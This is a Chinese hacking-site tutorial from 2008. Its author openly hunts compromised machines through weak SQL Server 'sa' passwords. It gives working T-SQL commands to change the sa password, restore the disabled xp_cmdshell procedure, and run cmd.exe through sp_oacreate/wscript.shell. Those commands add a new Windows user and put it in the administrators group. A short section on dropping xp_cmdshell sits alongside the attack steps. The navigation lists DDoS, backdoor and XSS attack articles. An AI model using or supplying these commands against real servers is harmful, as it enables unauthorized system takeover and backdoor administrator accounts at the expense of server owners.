首页  登陆  注册  博客集  下载频道  网络硬盘  学院论坛  家园
IT学院 网站地图 网站地图
收藏本站 收藏本站
高级搜索 高级搜索
 新闻IT新闻 互联网 微软 黑客新闻 网络网络协议 故障 网络管理 TCP/IP 无线技术 解决方案 黑客技术 漏洞 软件评测 安全资讯
 数据MSsql Oracle Mysql PL/SQL 备份 系统:Linux vista Windows FTP 防火墙 注册表 服务器行情 服务器应用 解决方案 WEB服务器
 墙纸风景壁纸 游戏壁纸 体育壁纸 汽车壁纸 人文壁纸 影视壁纸 广告壁纸 花卉壁纸 节日壁纸 动漫壁纸 明星壁纸 绘画壁纸 月历壁纸
当前位置: > 主页>网络攻防>黑客技术>sa弱口令强行入侵
热门文章排行
  
热门文章排行 XSS测试语句大全
反击黑客从这里开始
加密三剑客SSL、SET和PG
攻破网络的十二种常用方
sa弱口令强行入侵
Win2000 Server入侵监测
域名欺骗技术实现过程
通用密码后门
UNIX系统后门的安放和日
后门技术及rootkit工具-
精采文章推荐
  
精采文章推荐 小规模DDoS(拒绝服务)用
打造简单隐藏疯狂DDOS攻
用ASP实现反向连接控制
使用perl通过adsi接口导
详细讲解黑客常用的远程
二行代码解决全部网页木
判断cookies注入的js语
Metasploit渗透工具的应
利用Debug Api 获得QQ20
BBSXP绕过过滤继续注入
最新更新文章
  
最新更新文章 PERL铸造多线程+支持中
看黑客怎样汇编创建简单
破解数据库下载漏洞
利用sohu网站URL跳转漏
xdos.exe攻击器下载与使
DDoS攻击教程(3)
DDoS攻击教程(2)
DDoS攻击教程(1)
DOS攻击原理以及常见方
小规模DDoS(拒绝服务)用

sa弱口令强行入侵

编辑:   来源:  日期:2008-02-07   我要投稿      家园

我自己现在找肉鸡主要是找SA弱口令肉鸡到还能找到几只,但也碰到不少困难,到处查资料总算找到点有用的。

下面这些命令要SQL分离器才能实现,下面是一些关于sa弱口令相关命令。

注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。

一.更改sa口令方法:

用sql综合利用工具连接后,执行命令:

exec sp_password NULL,'新密码','sa'

(提示:慎用!)

二.简单修补sa弱口令:

方法1:查询分离器连接后执行:

if exists (select * from

dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and

OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

GO

然后按F5键命令执行完毕。

方法2:查询分离器连接后

第一步执行:use master,

第二步执行:sp_dropextendedproc 'xp_cmdshell',

然后按F5键命令执行完毕。

三.常见情况恢复执行xp_cmdshell:

1 未能找到存储过程'master..xpcmdshell'。

恢复方法:查询分离器连接后,

第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,

第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',

然后按F5键命令执行完毕。

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)

恢复方法:查询分离器连接后,

第一步执行:sp_dropextendedproc "xp_cmdshell",

第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

然后按F5键命令执行完毕。

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)

恢复方法:查询分离器连接后,

第一步执行:exec sp_dropextendedproc 'xp_cmdshell'

第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

然后按F5键命令执行完毕。

四.终极方法:

如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:

查询分离器连接后,

2000servser系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output

exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密

码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户

/add'

xp或2003server系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用

户 /add'

其实还有其它办法只要你扫到SA弱口令发现执行不了DOS命令基本上是他的一个扩展储存给删了,只要给他上传一个到SYSTEM32下基本上可以解决。只是这个我还没认真研究。




上一篇:反击黑客从这里开始  
下一篇:Win2000 Server入侵监测!
 关键字:  
文章评论】 【收藏本文】 【推荐好友】 【打印本文】 【论坛讨论

   相关文章:

   文章评论:(0条)
  
 请留名: 匿名评论   点击查看所有评论
 

  责任编辑:IT学院  声明:刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。